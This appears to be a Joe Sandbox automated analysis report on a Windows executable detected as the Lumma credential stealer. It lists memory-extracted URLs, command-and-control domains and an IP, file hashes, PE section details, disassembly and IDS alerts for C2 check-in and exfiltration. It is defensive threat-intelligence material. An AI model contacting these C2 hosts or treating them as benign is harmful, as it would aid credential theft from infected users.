                                                                                      		high
                                                                                      http://crl.rootca1.amazontrust.com/rootca1.crl0gJkNLYV0ax.exe, 00000000.00000003.1963875994.00000000060CB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&ctagJkNLYV0ax.exe, 00000000.00000003.1993681289.0000000006083000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1995668126.0000000006083000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1993011563.0000000006083000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1993362306.0000000006083000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1995975300.0000000006083000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1992273154.0000000006082000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1998731158.0000000006089000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://www.amazon.com/?tag=admarketus-20&rgJkNLYV0ax.exe, 00000000.00000003.1993681289.0000000006083000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1995668126.0000000006083000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1993011563.0000000006083000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1993362306.0000000006083000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1995975300.0000000006083000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1992273154.0000000006082000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1998731158.0000000006089000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            http://ocsp.rootca1.amazontrust.com0:gJkNLYV0ax.exe, 00000000.00000003.1963875994.00000000060CB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016gJkNLYV0ax.exe, 00000000.00000003.1918843535.00000000060E0000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1941252262.00000000060D9000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1941148892.00000000060D9000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1918935202.00000000060D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://www.ecosia.org/newtab/gJkNLYV0ax.exe, 00000000.00000003.1918466452.00000000060CD000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1918537729.00000000060CB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brgJkNLYV0ax.exe, 00000000.00000003.1965537429.00000000061A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://ac.ecosia.org/autocomplete?q=gJkNLYV0ax.exe, 00000000.00000003.1918466452.00000000060CD000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1918537729.00000000060CB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://discokeyus.lat/apidgJkNLYV0ax.exe, 00000000.00000002.2085484486.00000000019A8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		unknown
                                                                                                        https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpggJkNLYV0ax.exe, 00000000.00000003.1993681289.0000000006083000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1995668126.0000000006083000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1993011563.0000000006083000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1993362306.0000000006083000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1995975300.0000000006083000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1992273154.0000000006082000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1998731158.0000000006089000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://support.microsofgJkNLYV0ax.exe, 00000000.00000003.1918843535.00000000060E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://discokeyus.lat/gJkNLYV0ax.exe, 00000000.00000003.2084411862.0000000001A41000.00000004.00000020.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1963481216.000000000608F000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000002.2085788889.0000000001A68000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              http://crt.rootca1.amazontrust.com/rootca1.cer0?gJkNLYV0ax.exe, 00000000.00000003.1963875994.00000000060CB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://sweepyribs.lat:443/apigJkNLYV0ax.exe, 00000000.00000003.1917456355.00000000019C2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://discokeyus.lat:443/apigJkNLYV0ax.exe, gJkNLYV0ax.exe, 00000000.00000003.2025868617.00000000019C2000.00000004.00000020.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000002.2085606475.00000000019C2000.00000004.00000020.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1998637407.00000000019C2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    		unknown
                                                                                                                    https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplesgJkNLYV0ax.exe, 00000000.00000003.1918935202.00000000060B4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://discokeyus.lat/apiQxgJkNLYV0ax.exe, 00000000.00000003.1917303362.00000000019F1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        		unknown
                                                                                                                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=gJkNLYV0ax.exe, 00000000.00000003.1918466452.00000000060CD000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1918537729.00000000060CB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          		high

                                                                                                                          World Map of Contacted IPs

                                                                                                                          • No. of IPs < 25%
                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                          • 75% < No. of IPs

                                                                                                                          Public IPs

                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                          104.21.21.99
                                                                                                                          		discokeyus.latUnited States
                                                                                                                          		13335CLOUDFLARENETUSfalse

                                                                                                                          General Information

                                                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                                                          Analysis ID:1578918
                                                                                                                          Start date and time:2024-12-20 16:38:21 +01:00
                                                                                                                          Joe Sandbox product:CloudBasic
                                                                                                                          Overall analysis duration:0h 4m 31s
                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                          Report type:full
                                                                                                                          Cookbook file name:default.jbs
                                                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                          Number of analysed new started processes analysed:4
                                                                                                                          Number of new started drivers analysed:0
                                                                                                                          Number of existing processes analysed:0
                                                                                                                          Number of existing drivers analysed:0
                                                                                                                          Number of injected processes analysed:0
                                                                                                                          Technologies:
                                                                                                                          • HCA enabled
                                                                                                                          • EGA enabled
                                                                                                                          • AMSI enabled
                                                                                                                          Analysis Mode:default
                                                                                                                          Analysis stop reason:Timeout
                                                                                                                          Sample name:gJkNLYV0ax.exe
                                                                                                                          renamed because original name is a hash value
                                                                                                                          Original Sample Name:f158cdb34eb5c4de5eb858cce72f94cb.exe
                                                                                                                          Detection:MAL
                                                                                                                          Classification:mal100.troj.spyw.evad.winEXE@1/0@3/1
                                                                                                                          EGA Information:Failed
                                                                                                                          HCA Information:
                                                                                                                          • Successful, ratio: 100%
                                                                                                                          • Number of executed functions: 0
                                                                                                                          • Number of non-executed functions: 3
                                                                                                                          Cookbook Comments:
                                                                                                                          • Found application associated with file extension: .exe
                                                                                                                          • Stop behavior analysis, all processes terminated

                                                                                                                          Warnings

                                                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
                                                                                                                          • Excluded IPs from analysis (whitelisted): 4.245.163.56, 13.107.246.63
                                                                                                                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                          • Execution Graph export aborted for target gJkNLYV0ax.exe, PID 7308 because there are no executed function
                                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                          • Report size getting too big, too many NtQueryDirectoryFile calls found.
                                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                                          Simulations

                                                                                                                          Behavior and APIs

                                                                                                                          TimeTypeDescription
                                                                                                                          10:39:33API Interceptor40x Sleep call for process: gJkNLYV0ax.exe modified

                                                                                                                          Joe Sandbox View / Context

                                                                                                                          IPs

                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                          104.21.21.99m21jm5y5Z5.exeGet hashmaliciousLummaCBrowse
                                                                                                                            gEfWplq0xQ.exeGet hashmaliciousLummaCBrowse
                                                                                                                              gNjo8FIKN5.exeGet hashmaliciousLummaCBrowse
                                                                                                                                f48jWpQ2F8.exeGet hashmaliciousLummaCBrowse
                                                                                                                                  RZnZbS97dD.exeGet hashmaliciousLummaCBrowse
                                                                                                                                    SBLUj2UYnk.exeGet hashmaliciousLummaCBrowse
                                                                                                                                      file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                          k6A01XaeEn.exeGet hashmaliciousLummaCBrowse
                                                                                                                                            Inv59895_abubakar.iddrisu.htmlGet hashmaliciousHTMLPhisherBrowse

                                                                                                                                              Domains

                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                              discokeyus.latm21jm5y5Z5.exeGet hashmaliciousLummaCBrowse
                                                                                                                                              • 104.21.21.99
                                                                                                                                              gEfWplq0xQ.exeGet hashmaliciousLummaCBrowse
                                                                                                                                              • 104.21.21.99
                                                                                                                                              gNjo8FIKN5.exeGet hashmaliciousLummaCBrowse
                                                                                                                                              • 104.21.21.99
                                                                                                                                              f4p4BwljZt.exeGet hashmaliciousLummaCBrowse
                                                                                                                                              • 172.67.197.170
                                                                                                                                              Qmg24kMXxU.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                              • 172.67.197.170
                                                                                                                                              f48jWpQ2F8.exeGet hashmaliciousLummaCBrowse
                                                                                                                                              • 104.21.21.99
                                                                                                                                              R2CgZG545D.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                              • 172.67.197.170
                                                                                                                                              ylV1TcJ86R.exeGet hashmaliciousLummaCBrowse
                                                                                                                                              • 172.67.197.170
                                                                                                                                              RZnZbS97dD.exeGet hashmaliciousLummaCBrowse
                                                                                                                                              • 104.21.21.99
                                                                                                                                              SBLUj2UYnk.exeGet hashmaliciousLummaCBrowse
                                                                                                                                              • 104.21.21.99

                                                                                                                                              ASNs

                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                              CLOUDFLARENETUShttp://northwesthousingservices.discussripped.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                              • 104.21.89.240
                                                                                                                                              mniscreenthinkinggoodforentiretimegoodfotbusubessthings.htaGet hashmaliciousCobalt StrikeBrowse
                                                                                                                                              • 104.21.84.67
                                                                                                                                              m21jm5y5Z5.exeGet hashmaliciousLummaCBrowse
                                                                                                                                              • 104.21.21.99
                                                                                                                                              gEfWplq0xQ.exeGet hashmaliciousLummaCBrowse
                                                                                                                                              • 104.21.21.99
                                                                                                                                              gNjo8FIKN5.exeGet hashmaliciousLummaCBrowse
                                                                                                                                              • 104.21.21.99
                                                                                                                                              securedoc_20241220T070409.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                              • 104.17.25.14
                                                                                                                                              f4p4BwljZt.exeGet hashmaliciousLummaCBrowse
                                                                                                                                              • 172.67.197.170
                                                                                                                                              Qmg24kMXxU.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                              • 172.67.197.170
                                                                                                                                              f48jWpQ2F8.exeGet hashmaliciousLummaCBrowse
                                                                                                                                              • 104.21.21.99
                                                                                                                                              https://bell36588.yardione.comGet hashmaliciousUnknownBrowse
                                                                                                                                              • 104.17.25.14

                                                                                                                                              JA3 Fingerprints

                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                              a0e9f5d64349fb13191bc781f81f42e1m21jm5y5Z5.exeGet hashmaliciousLummaCBrowse
                                                                                                                                              • 104.21.21.99
                                                                                                                                              gEfWplq0xQ.exeGet hashmaliciousLummaCBrowse
                                                                                                                                              • 104.21.21.99
                                                                                                                                              gNjo8FIKN5.exeGet hashmaliciousLummaCBrowse
                                                                                                                                              • 104.21.21.99
                                                                                                                                              f4p4BwljZt.exeGet hashmaliciousLummaCBrowse
                                                                                                                                              • 104.21.21.99
                                                                                                                                              Qmg24kMXxU.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                              • 104.21.21.99
                                                                                                                                              f48jWpQ2F8.exeGet hashmaliciousLummaCBrowse
                                                                                                                                              • 104.21.21.99
                                                                                                                                              R2CgZG545D.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                              • 104.21.21.99
                                                                                                                                              ylV1TcJ86R.exeGet hashmaliciousLummaCBrowse
                                                                                                                                              • 104.21.21.99
                                                                                                                                              RZnZbS97dD.exeGet hashmaliciousLummaCBrowse
                                                                                                                                              • 104.21.21.99
                                                                                                                                              SBLUj2UYnk.exeGet hashmaliciousLummaCBrowse
                                                                                                                                              • 104.21.21.99

                                                                                                                                              Dropped Files

                                                                                                                                              No context

                                                                                                                                              Created / dropped Files

                                                                                                                                              No created / dropped files found

                                                                                                                                              Static File Info

                                                                                                                                              General

                                                                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                              Entropy (8bit):7.949018797283878
                                                                                                                                              TrID:
                                                                                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                              File name:gJkNLYV0ax.exe
                                                                                                                                              File size:1'880'064 bytes
                                                                                                                                              MD5:f158cdb34eb5c4de5eb858cce72f94cb
                                                                                                                                              SHA1:e93703e534ee3572c5134be5b316e1ae5feeb9c0
                                                                                                                                              SHA256:801900fc452dc3d0f333fe3be08e78406099be541daff50b7de46f4209d54c0c
                                                                                                                                              SHA512:a913c9e2f3bcd7b6016aa43838679ee3664d042c7457d97c75ed140659748f79a26c606c31c878a84207a6751111dc647292c2e7848c1a9d8c292622de16ce8c
                                                                                                                                              SSDEEP:24576:qMSCKY+AYJKpksr79fpldtXmnMzqBGn5snAaFuOVCyrhF2LUXasoQV4Y3NyTlZYX:BPKk/hplLX1n5T/EhP3gY9yBZYMMEx
                                                                                                                                              TLSH:AB9533192D287C16C79805754807AA2837B10B225CB1D6AF532E866FED9376EC371EFC
                                                                                                                                              File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....<_g..............................J...........@...........................K...........@.................................T0..h..

                                                                                                                                              File Icon

                                                                                                                                              Icon Hash:90cececece8e8eb0

                                                                                                                                              Static PE Info

                                                                                                                                              General

                                                                                                                                              Entrypoint:0x8ad000
                                                                                                                                              Entrypoint Section:.taggant
                                                                                                                                              Digitally signed:false
                                                                                                                                              Imagebase:0x400000
                                                                                                                                              Subsystem:windows gui
                                                                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                              DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                                              Time Stamp:0x675F3CD1 [Sun Dec 15 20:32:17 2024 UTC]
                                                                                                                                              TLS Callbacks:
                                                                                                                                              CLR (.Net) Version:
                                                                                                                                              OS Version Major:6
                                                                                                                                              OS Version Minor:0
                                                                                                                                              File Version Major:6
                                                                                                                                              File Version Minor:0
                                                                                                                                              Subsystem Version Major:6
                                                                                                                                              Subsystem Version Minor:0
                                                                                                                                              Import Hash:2eabe9054cad5152567f0699947a2c5b

                                                                                                                                              Entrypoint Preview

                                                                                                                                              Instruction
                                                                                                                                              jmp 00007F6644B37CAAh
                                                                                                                                              jng 00007F6644B37CC2h
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              jmp 00007F6644B39CA5h
                                                                                                                                              add byte ptr [edi], al
                                                                                                                                              or al, byte ptr [eax]
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], dh
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [ecx], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [ecx], al
                                                                                                                                              add byte ptr [eax], 00000000h
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              adc byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              pop es
                                                                                                                                              or al, byte ptr [eax]
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], dh
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [ecx], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [ecx], cl
                                                                                                                                              add byte ptr [eax], 00000000h
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              adc byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              pop es
                                                                                                                                              or al, byte ptr [eax]
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], dh
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], 00000000h
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              or byte ptr [eax+00000000h], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              adc byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              pop es
                                                                                                                                              or al, byte ptr [eax]
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], dl
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [ebx], al
                                                                                                                                              or al, byte ptr [eax]
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [ecx], al
                                                                                                                                              add byte ptr [eax], 00000000h
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al

                                                                                                                                              Data Directories

                                                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x530540x68.idata
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x520000x1ac.rsrc
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x531f80x8.idata
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                              Sections

                                                                                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                              0x10000x510000x24800cfb2728806fa9cded874d31d9696f11dFalse0.9974248180650684data7.981691303814376IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                              .rsrc0x520000x1ac0x20075720b8ea60aa06a31806981b744f74eFalse0.5390625data5.245569576626531IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                              .idata 0x530000x10000x20019a29171433eeef17e42fd663f137134False0.14453125data0.9996515881509258IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                              0x540000x2b50000x200e63b6326fd2ac679d203201f0419f901unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                              iyigrnpu0x3090000x1a30000x1a2c0022ab29aee6304ee0321cfa1ffccdb94bFalse0.9949096315298508Compiled PSI (v2) data (\235z\3737\220\322\370\337\235\3720\241\007)7.954353188539169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                              tggmxbsn0x4ac0000x10000x40072f1f942a6bc7c0e0900f2751e2d190eFalse0.7958984375data6.187155664427365IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                              .taggant0x4ad0000x30000x2200e4155e4460cae73a3a9d4336cb9c802dFalse0.059283088235294115DOS executable (COM)0.652005510550694IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                                                                                                              Resources

                                                                                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                              RT_MANIFEST0x520580x152ASCII text, with CRLF line terminators0.6479289940828402

                                                                                                                                              Imports

                                                                                                                                              DLLImport
                                                                                                                                              kernel32.dlllstrcpy

                                                                                                                                              Network Behavior

                                                                                                                                              Suricata IDS Alerts

                                                                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                              2024-12-20T16:39:17.895965+01002058378ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sweepyribs .lat)1192.168.2.4589991.1.1.153UDP
                                                                                                                                              2024-12-20T16:39:18.045613+01002058364ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grannyejh .lat)1192.168.2.4492171.1.1.153UDP
                                                                                                                                              2024-12-20T16:39:18.189508+01002058360ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (discokeyus .lat)1192.168.2.4551461.1.1.153UDP
                                                                                                                                              2024-12-20T16:39:19.893839+01002058361ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)1192.168.2.449731104.21.21.99443TCP
                                                                                                                                              2024-12-20T16:39:19.893839+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449731104.21.21.99443TCP
                                                                                                                                              2024-12-20T16:39:34.885495+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449731104.21.21.99443TCP
                                                                                                                                              2024-12-20T16:39:34.885495+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449731104.21.21.99443TCP
                                                                                                                                              2024-12-20T16:39:36.192992+01002058361ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)1192.168.2.449734104.21.21.99443TCP
                                                                                                                                              2024-12-20T16:39:36.192992+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449734104.21.21.99443TCP
                                                                                                                                              2024-12-20T16:39:36.965276+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.449734104.21.21.99443TCP
                                                                                                                                              2024-12-20T16:39:36.965276+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449734104.21.21.99443TCP
                                                                                                                                              2024-12-20T16:39:38.571587+01002058361ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)1192.168.2.449737104.21.21.99443TCP
                                                                                                                                              2024-12-20T16:39:38.571587+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449737104.21.21.99443TCP
                                                                                                                                              2024-12-20T16:39:40.841707+01002058361ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)1192.168.2.449739104.21.21.99443TCP
                                                                                                                                              2024-12-20T16:39:40.841707+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449739104.21.21.99443TCP
                                                                                                                                              2024-12-20T16:39:43.252650+01002058361ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)1192.168.2.449741104.21.21.99443TCP
                                                                                                                                              2024-12-20T16:39:43.252650+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449741104.21.21.99443TCP
                                                                                                                                              2024-12-20T16:39:46.580757+01002058361ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)1192.168.2.449742104.21.21.99443TCP
                                                                                                                                              2024-12-20T16:39:46.580757+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449742104.21.21.99443TCP
                                                                                                                                              2024-12-20T16:39:49.456371+01002058361ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)1192.168.2.449743104.21.21.99443TCP
                                                                                                                                              2024-12-20T16:39:49.456371+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449743104.21.21.99443TCP
                                                                                                                                              2024-12-20T16:39:49.461411+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.449743104.21.21.99443TCP
